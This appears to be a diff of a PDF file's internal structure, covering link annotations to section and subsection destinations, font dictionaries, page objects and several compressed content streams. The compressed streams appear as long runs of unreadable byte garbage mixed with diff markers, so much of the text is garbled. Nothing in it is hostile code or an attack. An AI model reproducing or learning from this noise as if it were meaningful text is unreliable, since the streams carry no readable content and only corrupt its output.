0]/H/I/C[1 0 0] +/Rect [108.853 137.828 360.819 148.619] +/A << /S /GoTo /D (subsubsection.5.2.2) >> >> endobj 490 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 232.572 140.955 241.44] /Subtype /Link -/A << /S /GoTo /D (section.6) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 119.052 278.951 129.842] +/A << /S /GoTo /D (subsubsection.5.2.3) >> >> endobj 491 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 203.836 128.74 212.704] /Subtype /Link -/A << /S /GoTo /D (section.7) >> ->> endobj -497 0 obj << -/D [495 0 R /XYZ 72 793.935 null] ->> endobj -6 0 obj << -/D [495 0 R /XYZ 72 189.823 null] ->> endobj -494 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F20 418 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -510 0 obj << -/Length 2876 -/Filter /FlateDecode ->> -stream -xÚÅYYsÜF~ׯ˜7s*Š÷áªTJ>ã”Å—7åMmõ [®yŒØ¤äɯ_ æ1CÉyÊ>±4>Mgq³poÎnÏ\ø: w{‹8ul7MÛòìëŸÎ"ƒñߎ¤Éâ^S•‹ Jà[,®Î~?{¾>;í¹‹ÔN#/Z¬¯‰‡o§~¸Xg‹¯–k/WIXo«¥ïYmS/Wðͺm›×ÕòÏõoç¯Ýp´>ˆ|Ûñ`½:@Š3‡%…­‚…ëÚizH»bâUàÛAš ÝåÊu½Ðú$o»¼‘¥„­]«U3»9‹•Úž“ÐZu[”bú¡•+üV&ï–^bÉ¢† ld<_±l¨¹æ†UøéÍÙâ«^wyhwu5‘_Ï„ÖSb ˜ÿ¡e¾¥±z³\…¡õ_¹mWu“ƒä°c;ÚRw›}#ûÁ}Sß4¢,óꆢºéÄÅAb­wt’Ð*Å7}­<ºëÛ‘Çjkw¨ÒØjA{Ü’[uC ì›É½‘Ð!4_7uI4ýz£¦F´$Œ©ƒje E~l½miE]šnè¢Ô'Ö ‹0>zCƒt1ʉ -Ä»íË\7s§-\ i5º&㘘ràÚ‘¶u½Ô³Ãr;ò#C£OÊ™-K•K×jöØj°9Œñù”Q¨”F-™ó¾*j‘‰M!§*îdÒ˜ êàߎmsÛ°VTÞÊ“VFðeâãÝã±³køoç‹‘B岓\Öè´êWadûN0½€7>Ÿ¿#µtßÉ,³\µM¾éØR·u)Ù!º–×ô%ë€Æè&5£ÈºÏÛÍõ–sâ4T­( -ãC¢âF ì™äs•o¥:š/¶sfõñê_0ºhG$ôtMÔÖ]žIšÎéæ±¹N@ùm îΚ1AÅ|v2gã€ÞuÝ”¢UÔ!YB´#‘†mñK:‘´{F¸º/àÆZž{Eß¡…[ÁmnØoæÈÌÕâ›Kñµâ ?È@Ž”l»ýÊ 4F®†ºp8j|Ç…Iô”zï_F5Yû> ‡¨ò®ä=YÕv/]bÇqt -ä,rs‘Æ(PàGÐ.ºwR¡ö'gC|>€+ïQSuómâùP¡¥KfÎ[–…p²VíJ~‡-òV´y/;ߨ˜áµmX‰— -wøÇ2 ÀIh®’Æ  ÏŽï âĆUJŸ-€5_ IèóIáfs•%]å´æO­çD->=‡¥1ÆüùŠ§{¢¨pöRÐ¥GgHæÐ9†\¡GgchGAàŒlhå;©íEÁÔ”Þ^#u -JÂ5uö: ¶È SK´-zt M}úh#‘Ûï‹|Ë׌쯻->¬ß½gÚ´MÐ5Y‚‡À/8/ °ã†±y=KÆ•‰–'¯»Jg\¢€Ûí!úÈ>ú#¢â+ôº–€fð]ssŠc=°æ$éð¸¹!8¯èlE9g'Œ9‹º«æXù¦A©Y|ø¸'e€¼àÍ9 x8ÚìÔÑHj4]UQB_ ­-¾Œ¯`ÿŠPJb>$Œ«í=™5¸×Žfµ‚aÂ(øáÓÑåáÀi‘W§±fé休ỡôÏ„ÉÄ\ˆÄ‘OèCÔÐÙÝ2Œ,Ayx0 k´ˆ öGÁ Ô‰ÄÅsê@4ß’Á-2x ÈLÛZKŠË»=#bÓÒôØf Á#Ÿ"äxÛ«ßßшÚIm™‘ÿPÌúxÓNL”ˆC4|¨ÑEp´Ý ÜØѨâÁS`l:¼kíä§h0\‰‘?hŽò9={yÀ{票–‰æ1‹wbígo¸žÌ¥;‰e8S63£ˆ“†rôywùCç… + —ŠaA§2;ÈJZ#øMuØÖûñaÊÒàΡºýQ*2¤(é TSíŽë,¢È:m0“êtàvšô…¬ÇuåÕVV-õ#õ$ëùlŸ°Í(12cjñ"&vÕe¹É?°¡ïHÛ›þÜkïÜð•1¹¹r4´bÈ» -[Ù1·¤ç¶'ÿžÈ(¶[¹oùC¹ -Ì W:ËMt–;ëuw:ÅŤӔĖ©ü=o\nvöýÍ«õ\@OíÐOGý”ëÙ±’ËWs|¼ÀŽ‡Òn/0Ÿk)Fñ0QH"ë×õúrf‡4¶}¯Ï*^Ôõ·\Îìáƒ!x±!#”© ¡ï{Ä¡ •Yüõ|q#«vf(³Ü 'ÝNHæÝï‰åŽ’E˜¬(Vqæ…v ÙÔäâ´aSÂziHÉ~¥âŒ™z„ ÓK²bP~ú ‹b߀ ž#Z ÞšO…o”å@÷®+*pÎMÞ§+¦¬zØ; 8Zó,çÒ½T%ÑÉ¡„¤À”þZEßRפ„dó•aƼ@/Ä/½ŒÔJ÷£8à\¼bãš¾NÐ| iáæ¹áêp%µ ärb#¯/—X˜¯–ÃsŒ‡Ž2 ŽS_óYð¡JÄÍË:Áù•š`+€m6VúØñp<™ '/róÌ€ 4~0`w+šÉUH×pº™«g“1zŒ ¸dîäÚ©Æ>f׶ûgççnìÙnd{pNè»ç$ÎË4ÎaËÿäUkïwû_òìgwÆ×Vîüjx¡TWÊá0ÿ°˜?]|xù“û3PþXbcËê8XêJ+=¾aŽhÇ´IoòJð­Ô¯·ü¿Üû»ÏrIècǼ¥E\EáÐèt0 §C\‰S*Ša¾”Úõ˜Û.´FEƒÃÖël•628ª7¹f:¢¢6vÆ(ˆã§(ÈTfs9FýÄEšxgD<OW†zâû}<¯S--~ç÷‹};õúðƒOÅßñ†æžöS;ÕP‡Ç•1 ýaë~—3(ën)µòIT>¶*óf í·p?/±uŽÍË«§§4ï &4ô¼yëSŠ®çÛaMU1H ÄóŒ9D^v/QAùðWÿÀã÷h€c‹y1OƒwʆßEVˆ›³˜ÊÏü‰g™/DÍÛ.׌@!VjæІC†‚2ZÅãªIçx ¼-±Ø²ñÊÞ†pa@A:DÏ0¯¸‰©ó7/ɨB,`U›qÉj0 øùÂÈJŠ€Æ†ŸXVs‹WûãP ùN9ÄI–ý(NB¿¢l,èß-£}˜²íþ æ"a`úû%~¿<[®Â à³|+ôò]³l¾>Û’¢2©óQ·]3€ŒðýAúÉ]¹øúÑÇ9XñÑ(™|Á”J :“cÁÀ•Ù06^â¯;ü7eþ\lÛ“z ¦! ÇìÀ2¼<Çu¨EÏÛ:/Ë›H‹gý²t]׺¸º¤åô{b?êÈ£·£Gó?¯cÇÁ3¸ˆ˜ú 5­0,”!|L™@PÖ˜c‹êXÈL$4ò’sĦ}ºム!ulƒ'RÒU8€XE­­ YÐ?h=Xìƒ -€ÉàøGµ~LäÏ͉U€Š¨ù‹Þ€ ÅÅ/þññR´ã ¤¦Ò/ZL‰Qm¦ïvß± ‘cî¢+È5ƒo±:Þԯ뢠z«Ï)èÌßv²9`eöÔ¼—phP²Ë8À\þzi^ìæs­Wë³ÿLHg -endstream -endobj -509 0 obj << -/Type /Page -/Contents 510 0 R -/Resources 508 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 422 0 R -/Annots [ 492 0 R 493 0 R 498 0 R 499 0 R 500 0 R 501 0 R 502 0 R 503 0 R 504 0 R 505 0 R 506 0 R 507 0 R ] +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 100.276 349.074 111.066] +/A << /S /GoTo /D (subsubsection.5.2.4) >> >> endobj 492 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [172.983 722.345 206.931 733.135] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 81.499 325.571 92.29] +/A << /S /GoTo /D (subsubsection.5.2.5) >> +>> endobj +496 0 obj << +/D [462 0 R /XYZ 71 806.89 null] +>> endobj +497 0 obj << +/D [462 0 R /XYZ 72 760.449 null] +>> endobj +502 0 obj << +/D [462 0 R /XYZ 72 631.328 null] +>> endobj +494 0 obj << +/Font << /F17 498 0 R /F15 499 0 R /F18 500 0 R /F20 501 0 R /F21 503 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +544 0 obj << +/Length 1509 +/Filter /FlateDecode +>> +stream +xÚíZËZ£HÝç)Xº®@ÍÎkÏô¨±5®ìþæä™æÒê<ýTQÆ@ŒÒj_Â&$„äœÿrþSŒ™Œ÷ƒ¯(ŽÀ€†‡ 2fŒ£Áåg`LÄùpó›òªÈ ®/Žsã|ðq°;¼;DÐ`s‘kŒ¦êØa˜£‰qiî OF'£sëóèûCH—.%.v÷*/DòŠÐ?Jý t¦ÙÙûaâ;ÀGìÂÔ§¨ƒ-„Ì3þµàYþà.Æ¥íaÏt,›ð=ÂØ Üå7ø¾t!„Ì„lu9 0ƾãynÍœwóÏÑèÔ²1Ææ$ȃÕ/¡âŠžŠW!49AËœ”I‹ÐRÒŠœõ‘_%í^’| yKnc⸌V—]ó`ÂÓFjú[›ŒÝز™ïP„›œáçpv‘ñÔÞ™ñ8oáRÇ…ðqÞ €ä²òV_ÔÆ9—9·;ò’Îø”§ +úÕÌOyœ!Dé¶6½®¬ìxiÖ¼{Ö¨fíà6OÕ£ªnEú4Sq‘™5XpÙ–7¬MС/¹ ­°H“<±lä›ãd®NE~ÍcKœÊÃq‡I¼ú|ô{6–nqß‚³÷œÇ<ÍÃO22ôþ…‚½PØP ÐO€‚sñkd-ä™·w--÷ÃȦJÒ… ¦ÙØçó@ëb⪌ožËS7’.b¹|‡cyòúaíÇfÚ>o +}ö»ïg%ÀR …À²]ù9'ñ$SðÉŠ"[è7ó4L“TW•<ŒxRèwÅÇc>n+-±_|VëÌ*dƒÛ0’@‘B*–!\”§4¤©z#™VÑ›§!×\Ü\«`'¦(á«q¾ú2# µãûþÏW{!R†óœ§a<Óÿ!Hg<ÏÔž¦I´TŽ}ó[8á“Õ]¾œ'úEVß+å³bhxùí¢Ô‚Rf¥( ųf¼2¾ºÈB]ð +¯K`n~“h$¡ÆâN"‘úŸf<ËîcB'³Œ5Q:Õ‹I B®p½“²Á4W1IÊOË[«WQ >VƯ½ˆ³b<_7-æJo#]×ë‚j+€›íÈvS‹h;r¸‰þ×*„<ŸôÞÕËô,û±nL¤¶w‹x2×…/y„7—Òÿø7 + ©]Æa‘/ªö¾Hù$lmï¾ { :—ªüqcÊû›ó…½3Ë¢Ï%‹‘¾­ÍÜÒ`àäâèh“Ðem™°U^^¬+o/‰ÇEšj›â^éʱ\ +•¥Ñ|Æ`ôX¯ŸöHíÓßÔáüþLʹáÅé?{Ó½KÈŸ‘„¼B›˜ÙB)G¥‰Y,sõ“Ç‹Ÿ}„Æ•%ÕÊò¯øß5C0£½|å^‹»-uÓZkŽ,_Œ‰Y\UŠs¤AÄÅ4$S"+sbµùº¸_Öþ®@kÁy(ñOÒqå/U†‡ÜxpdúUÄÁŒGKBÔ¨»,ç•¿"k¤Ÿïmƒr¡µv|(“…6¨ÄÈUy*¡öÈ[‚DžÝi-ïöŠ,¯ü¥°®Ü:ñK—cž“FÆC¶=%¹sÚ!0ér "­)´Ë¤ÁWvœ2¨Zö¹pk·u£aXqµXÙ­U¬xÌïÉ+mÈÛÌÚÒj•rÄ• 0oìi`¸§íí³ 4©ªÍY˜}iT1Âz´\KòîYª´Òh¸?üCµýSÙõƒ™«…’q‰ ÌZ|OoOµbîvì?žî?jÜR+øq(-æRî3àÅ×ÝnÈ«;PËf1Y”›6ê•ÁzâØß=>¯l»LÍI\ Ó¤Zg #n—ƒ 4µÏt5c½ Y»Uá:1ïíâ4¡AKµ¤¹öûr ¹ =¸§ç§¡Çn_òõuW8 ãOi¨M‰ÆQØÃ^º•{ÝZ‚oÞk¨ƒÛœÇ™\«ÔÛM6»NÊUª6çDªþË-¬†uàJÁ*b£ÁÿU¸"† +endstream +endobj +543 0 obj << +/Type /Page +/Contents 544 0 R +/Resources 542 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 504 0 R +/Annots [ 493 0 R 505 0 R 506 0 R 507 0 R 508 0 R 509 0 R 510 0 R 511 0 R 512 0 R 513 0 R 514 0 R 515 0 R 516 0 R 517 0 R 518 0 R 519 0 R 520 0 R 521 0 R 522 0 R 523 0 R 524 0 R 525 0 R 526 0 R 527 0 R 528 0 R 529 0 R 530 0 R 531 0 R 532 0 R 533 0 R 534 0 R 535 0 R 536 0 R 537 0 R 538 0 R 539 0 R 540 0 R ] >> endobj 493 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [347.795 695.087 396.961 705.878] -/Subtype/Link/A<> ->> endobj -498 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [161.681 635.424 261.605 646.215] -/Subtype/Link/A<> ->> endobj -499 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [187.261 621.795 230.478 632.586] -/Subtype/Link/A<> ->> endobj -500 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [209.478 589.39 265.422 600.181] -/Subtype/Link/A<> ->> endobj -501 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [286.117 589.39 336.582 600.181] -/Subtype/Link/A<> ->> endobj -502 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [408.48 570.614 460.274 581.405] -/Subtype/Link/A<> ->> endobj -503 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [433.148 543.356 469.476 554.147] -/Subtype/Link/A<> ->> endobj -504 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [203.419 510.951 230.783 521.742] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 747.553 145.623 758.344] +/A << /S /GoTo /D (subsection.5.3) >> >> endobj 505 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [184.175 131.74 361.226 142.531] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 730.714 194.04 739.568] +/A << /S /GoTo /D (subsubsection.5.3.1) >> >> endobj 506 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [462.362 131.74 540.996 142.531] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 711.938 238.17 720.792] +/A << /S /GoTo /D (subsubsection.5.3.2) >> >> endobj 507 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [208.398 118.112 271.082 128.902] -/Subtype/Link/A<> ->> endobj -511 0 obj << -/D [509 0 R /XYZ 72 793.935 null] ->> endobj -10 0 obj << -/D [509 0 R /XYZ 72 760.449 null] ->> endobj -14 0 obj << -/D [509 0 R /XYZ 72 498.01 null] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 690.948 259.086 702.016] +/A << /S /GoTo /D (subsubsection.5.3.3) >> >> endobj 508 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F24 512 0 R /F22 421 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 674.385 243.399 683.239] +/A << /S /GoTo /D (subsubsection.5.3.4) >> >> endobj -519 0 obj << -/Length 3733 -/Filter /FlateDecode ->> -stream -xÚZ[oÜ6~÷¯t‹íˆQ¤n-ŠE»MÚiÚ&.‹lPÈ3j4Ñ%®ÿýž9’FNƒ>Øâ‡<·ïN¸º]…«ï/Þ_(ø†+µJ£Uš‡ÊóÕæpñö]¸ÚBû«00y¶º§Q‡•I2øV«7¿^|{}ñôy¤Vy'Q²ºÞñ:Èu¼ºÞ®Þ®Upy•åfý¢¾ÔѺo›Ë+øn‡M_6õå»ëŸ>Wñh¾ItF°ÍŽqÄE(”ο°u²Ê`jbpê•ÑY ”ÆB`LÎK|þ~°íÃåUÅë¯ùóÙ¥Z¿yöòÙ¿¯¹þvÓTáþ_‡üSÜZûŽ‹Ï_ÿ S~’Ñ}qSÙ³1ÿùáÙëg\,·0úëϸçW°ðúóß_?ûõ·go®ß~Qn¿x÷ÕÂÙ¯"äaJß$• ü¦ƒËãõÃe”­›+›¢Æ‚YwÖ>¹¼2*\Çãå ±õ¶¬o¹FE)̤JÓïmËÓ»‡W닾ÜUõÀ­.ãd]T@=Ußüú’'nX’ØEíÅ®wë<&B¹,WwMˇ‹¢Ñá4J–Îga—ó P&ЙÒ ¤r/GöTÀ<`qh‚8ÊVWJI$¼¾/« -n#Ìáhwxt˵cUl,_ÓýÞÖ2dïšp{㯱*7À¿‚OŒmÇ¢ëlÇežÓE¬¨­™õÝDùÝ0ƒ»¶HMÑIÿ¡¨‹[{°ÌÑ=t½=ÐáB9UƧê÷ŒÑ&_Û?ífè‘ UöO° GJéºßãÊÜHda+«AŠÔº„âI'ŒRY¤cF}- -ñͫ︠ åœyIDÚÏêxo ’)¨¢ŠÉ–éX6² ÊÜÔëË4]· Lç[D -¶ð”±ªâ² -OØÚ~hën|n(t ¥Ü„k—)£A$P„Ïd3jÚò¶¬ *­5Ü*–îË~Ï¥o“6‚Šl%Vâ­g±ÖFÈ”éÍÐˤ}ƒcîYk5k-3zY ¡`Û¶iyÀÁv$ð KS¦ø§¦µ´Þ’êŽò„ø]£}HàÄÈ,uåሖ,Êb¦ mÑ=ÈÀ†¿eý‡…é›^fml]´¥ëìyþ=ª[3T[®Þ°-â1EÕ5ÜÌ&ªéºò¦²ã]â±ý"šÁ¸6²ãC'%àÆ«À†wIgXî€j=ÉEš(:oïÑ‚³¾AŽà¦'u½h2]æ–»ýJhJÛÑô˜Ì5—5L«Éà@­k®™‹Õªäµ–,d’‰Ix¿ ‚àÝ?Qý¾rú‡²öó58Y™0Y¢‡ƒ³yýß,hQ‰R^Sw"ÈNˆ‰“h±ÂæPl! ³l”ë¦jnEF»Ax×´}· ÞhQâØ;u¼Ô;{«5im¶~|ðl(f-™'Û-Y˜8ˆso'D™YXº«$ý^(-–HIò Óž’ÃPõ%©’t¶¬)`—HÈâ ô -Ä%à®=ÕÃW¬ÔhÛÆÒ« WvÍÀþA‹Rb‰¥ -¨vç„ôúÃPÕ¶eèõcÑ‚µéIÃv+óMe"à@ûç±jJÙß}oÄÄ`¼Qy*`2 ©ÒÎ(ÎäÓÄi›è£üÊ šh£§•93Æ :“À®¯aK×Zб®_´t×gÐä!±d A®•1G„µí­àÛ×ß_¬ÞÒ¨ÖvÍÐnXÊ<žÄNX o¿DŽ~e{· ‰²¦{ÂzYó€­=¢?À¦½ã;­Ðð÷ØZ6Çì Ⱦå Ci)Ð0ÙŽmòâ¢Yîù:¶~c ‰žd«P®‡ÊI8©[qSV` TD 3#ŠO +S+‰· á½lÔñ·µ›æÀfk·ÜÐ7<°µ…kÙÌáI;þz¥ ¥‘©X óSwÅ¡DšË¢]2õ#_ì¨ì::©T3Rh£-KÖm#þ Åži›øõî}u(Ž‹‚÷ ^ @BV -îƒÁ¼]D ØPl· jà!`–VAšy[²ïûã—OŸª4€a­LÁ!aÐS¦äéáÛ¡òôÖö¿—u÷Ç:[J© -BÁdq¨@/…#‰NÈÇ„QE3•e)[7•»˜JJÅÐ78|9Ñ ÂLÑ|nŒD3‰Ãl*ÏŽ%"_lEaÊÝÄÃfb ±Ã[˜Q‡í#À9¹|p%Y<ÑÀrïmNFŠDHèN3Âý¾úØU€üäA&P€ÆTÿËøÎÎâ;¤3Á:Û~!ô5GÔ×mê[ÛÛÒ!‚•T#ï{Àó´àŸðCÁ†c8)=n¿SXC:c[È›•RAŽ¾Þjp?qù {+Ð÷ëKˆ]hÀÓu‰v) ŠQD¡H) ´(=‚YSuŽÐÖÚp᥹Mƒw‘¿gÀ{lCõÉ£Õ$'úé:?ÊöI -eªõÜ'OJ2+¤ßT%‡£tdÝK®œH]g€}ù)³BYu5Dw¸NÍŽ¦æ& ¦ ž ½æƒXsR§©,a$dBô´&mâäãt¦q`ä} `6UŽÑb¯t¥ÉÔåÂR¹Då>·t@þDÔÁfà™1Jpb"öé“iŒF°$h„ð>ΣÆó\ -®2Ê¥à u¹Ã˜>ð‡¡]ߢB/¸qD:È¡ÜõÜš䊒Äݘd¶ÎoÔ.O²SvåæjB j}’QdEù(*.w”„ë7xg¤I8?½ß7d Èf -h–¤—|çx<é |!t‡`ŠíÇi:1< ì7³È|èë"·ç—™Â!t)|Ú(I–„vpÄ¥Ô™¸4ö0ûÅÜrB6šË€”é~âÅ»·–Û槗Ü!)hçR>n²ÞÝÞ2 ˜³›âG’‘VÂňêù4f†Q°ÏKè)Kq.¥~ÐÈ¡cqf{(kÛÍÄ/v"ŃëÚÍ6ž²I‚‰vðÍÿiˆWÎ)É4œv#/a»kXvÞîBµ¨náœýþÀÕ‰µ'¦¤¬»úd-¨ä ¾bZ€€²„¸r?ñ ²T·ti&Ëfëí½¸¥ùXøÒÌß%–Ï®"VbNf2îPüYÈ'¸¡ó±†at‡×rœlí¾§k@~ï -ˆvÎ=»r Hê{ÕŠ#ßGÁ;°¿‚:û¼ß^½øùJ….ËŠE„r%9Â?$OíœðPáǽJžð7ö~ÀwIô€¹;y>cô#žÏ€çóy“Ý€ˆ÷]&÷ÓÈJrâƒwvìàL@à3åÒ‰™ÙÌÙ!{8²ÉM§Î;Æ!8ŠˆH“ŒÏ¼Xí‡ÆTDéüÅ Í'/©x9ýWvÁ™8SŽ­íý“…D`оäéò,ÈNÍäsc/%ëõ¨÷Ë`ûâxÑØ× »X€\¯]8/൴íøË׆äú09Ÿ'Ërí|Œ“'b¯ÊBåÓá)›‘o³ã¶å|LšAŒ§?ÅíDlî±qu Ñ—.êa÷ŠßDñ/P"·úÔ}ÀråÕ/ Y2’Ðg,±_HÄÝ$á8;33#Q¢‚,ôwzDégßmÈÆa^“|f-À¿}`s‡M"ôXäÛ S»EÏ »I>n‚RÄÆKÑ8º¡œ ñ5©tü1¡B´÷³Ù -×ï÷’3ÅŠ¼…'åݬsƒC¾TCil AÚJgÍ߂Lj®®„ø9jó2lèI,êZ—ïâwŸ€Œ˜‰Ý3‘¡¹ídšÐÖÊ ¯•0®”%¶ew¬ -Fô< WÉœQÁ¥g¸b4™]¼{|?(:6Ï8j7£ lä­í—Ò_CK‰‘JžÅò#´p‡ÞrG»:t9±M1pô.àI+ŽE"†Xv Yå@tJ š›8n¿½iý5ÊNãVqÊ Ýþ:¡™_µØÓh5¹x}‚mK^dd6â{8)åý&Bú:r¦DNÇ|WfÏuÈHí•’ÈŽ!®6c0Ž)ôBuz„ÆÖà>È›4Mmäë¡rAE]ŸŽ³ÌßÀYßbpöeÏVQÌ>yAãþ³‚³°súJà chæÇ ÿÛ~1œWàìÒñ£Mä-'r¼è¶–€€$•Ÿm°Óà ’Öyysù‰”hŒ F'';OÜízñ*|6&T'ò‡Zå’‹Æh+Ò€÷˜¹v Û§¯eÜDïM³§FìF¿M÷Füð€?Í Ü–è¾[óÜœñfnn?¢ÏƒHÚ ™g"Ôo)MlØFÇb³°A'±‡¤ýjÇu(G‡òjÓTL}$[©80>q±ôË™8ˆ¢Ùïb…O²U%O'îý6>ýH™×>¬H~Êœ¹§˜ß1°Ë?lcE~±•‡À( -ƒÔ»Ì=S‘EÈò3c‘Éï5àë1f&Pߨ†š l|²Y¸-3]f'î‹¥ßsD‰ Ìé-àqœ—èG¹gjdY¨ùm›–·í' o«i¤©WSL ó¯]¶–’Ïå#C‡ÀÄéY2dá!9 -’TÍwP£ÌÅ2¨Ó»úù-zA¿Kxà¦Ê’hÏÕe!Ùg²:0@~°Cíòº•)yƒ¦û¶ì-‹ÍÆvݬ¿qžß]9Ñ•™šýÅo ßÖx’ð¡IîÝïyÈ)AÇÖ½ *ó¿ö¡£A¾ÚE~Pê­m«‡Ò ˜þx GŒ²ü&”/QÒÔ'¶t>¡i\0þÙB¡Î§†nôô xëÊÊÞÚ.Xüùß³ë‹ÿdóŸÓ -endstream -endobj -518 0 obj << -/Type /Page -/Contents 519 0 R -/Resources 517 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 422 0 R -/Annots [ 514 0 R ] +509 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 655.609 235.514 664.463] +/A << /S /GoTo /D (subsubsection.5.3.5) >> +>> endobj +510 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 634.896 276.516 645.687] +/A << /S /GoTo /D (subsubsection.5.3.6) >> +>> endobj +511 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 616.12 322.472 626.911] +/A << /S /GoTo /D (subsubsection.5.3.7) >> +>> endobj +512 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 596.79 212.605 608.743] +/A << /S /GoTo /D (subsubsection.5.3.8) >> +>> endobj +513 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 578.568 294.971 589.358] +/A << /S /GoTo /D (subsubsection.5.3.9) >> >> endobj 514 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [149.191 584.776 190.637 595.567] -/Subtype/Link/A<> ->> endobj -520 0 obj << -/D [518 0 R /XYZ 72 793.935 null] ->> endobj -18 0 obj << -/D [518 0 R /XYZ 72 468.223 null] ->> endobj -517 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R /F27 521 0 R /F14 522 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -543 0 obj << -/Length 2867 -/Filter /FlateDecode ->> -stream -xÚ½YÛnÜÈ}×WLžÂv¸ìfó ²e;ëø¶+F`/ŠlÍ0ˢMJV¾>U]E9¢ÆA‚†Ý;VWÕ9UôVÛ•·zuöõLÀÓ[‰U$WQâ¹"IVYuöùwo•Cûë•çª$^ÝÙ^ÕJ…1<ËÕåÙ¯gÏ®Î~~)Å*q“P†««šÃw?X]å«ÏŽp×›8QÎ/õÚ—N×6ë <ó>늦^ÿ~õúç—"˜ŒW¡ïz°£CìqæñNa)µÂM‚@bß wÞ(ßU*Të2p.tÕ,¬à­62p¥Sÿ¬cßizØ–ï;YZSán-c'í²µŒœ5}‹ºMKjÈq~[º-rݘŸ°¢œn§ï©9m5vétNe:õI¼Ý²è{u¶úl‡Ã~ìç -·Õ_¯7¸äL -¶L^ó„eQÿa7–Óú7mSZ¶£ÛÅ)]’Ö\È ._¹I<ÞgÀâý[aº¦½ç1bAÂã®ÀA*q¤'¼£;j2TÀRJÁxåz*¢ñ_<ëÁt9,ùƒÆ¼MÛ 5 .-G¨%K\?Š‡?=.¬ÀÎ3ÝÖi›ÃM«DÔ±ð¶hS¦¨·Ç²Ä÷­.uj4u6]z]rù‡èÖ úÛ†æ†;}9åZ8Uº_ª •ÆbضçÆ G‰ ›úÜè´ëÛ¢ÞÒ -h7,~O5z©½õ*€$«ðÝPòÍWM½5ôõÚhÐqÒ5ý~oU³i‡·( á;ºF]ì+0“NÓ+’™@«¯öÔ+-KnJA4 'ógže¨œ5v®Å’‚XŠšNã{£[ê´Ðsz—AצÜØSyóóôUýÅ <?N€‰áÕeñïÔú#¸q¶,,èz—Ö™ÆÑVr¡xXûÜi.¤d‚´rô榯­«KË¢+´áU{’œ^óZUoÛÉNîŠn·tŽ·ºK;lŠŽ\€ïÂßzîRòeÃ}PÍðYuÓRqÐê9Ž¼î·Tøâùê+Èc»!ëÛH°ò$y’Á>Ôf_º2QC%?üµD!Œºa/¨¡C'f¯›nƒÞ¢;ãÓßqÁûþº,`Rƒ³ïpúü¡»TÎi¹(Ø{=A0¯S ™}:øعó\)ã#Ñ|Ö -sú˜¤r·êàt<Í4„ÕŸ5«; /çV“wÏG¤›I ¬úñG8hZÃFìÀW­Ö™aÒ>_÷5· t¸ ~q¼Ý^áFÂ?`Ž1ÇK~(æ\À®+¼«kKnÐôý°gÉAÃf,2¹7Ö&¨®Ð9—]ZíSœH†€%û²°fŠ—Ðð}¾Í¬3Ŧ›†äšP„\6äjq€‰)%ó²A7Š¬±#Íá ÑÜ‘“‚ï"*ï &xÿ3w”33‚µÌ±2!šDŽÑŒÌo&Rá ×Õß6>øÊI±-/r -X•K[‹‚`˜ç´•Ê p½X>ÁL._EÂK[ Cןù3™ á9w-Ø#ù¬ZXõºm,T) •…A¨”³‡Þ”m+Ž*ºr4îkÅ>ÃUá,†¯cY <Ó–WØPݧǽ½Ê´åm–0®[û†;Ó”]±Ý•ðo=ÃgUƶIKœÑîaŸ]Áª•S‡|`34Êò+èŒ@ÕÚCÛvp#TœîºÙ3M×Cò4Ñù—Îx0q(”)·Ý‚vD/ÈÜ°„æ6çø5,ïG"è’ûÛXb¾AâFI¸¨›qßd¶(á k–HŒˆØ ðÊÆÎAŠf Ôo;;Ìjœy!$oæ4„T‡•}ÒòÇ•G¥ÂQ‘ÏþÏb}× Loñç¡xU– <fÞ]y3TŽš•8¯úbh 6&Ù‚ÕmSER]´ÔÚêá 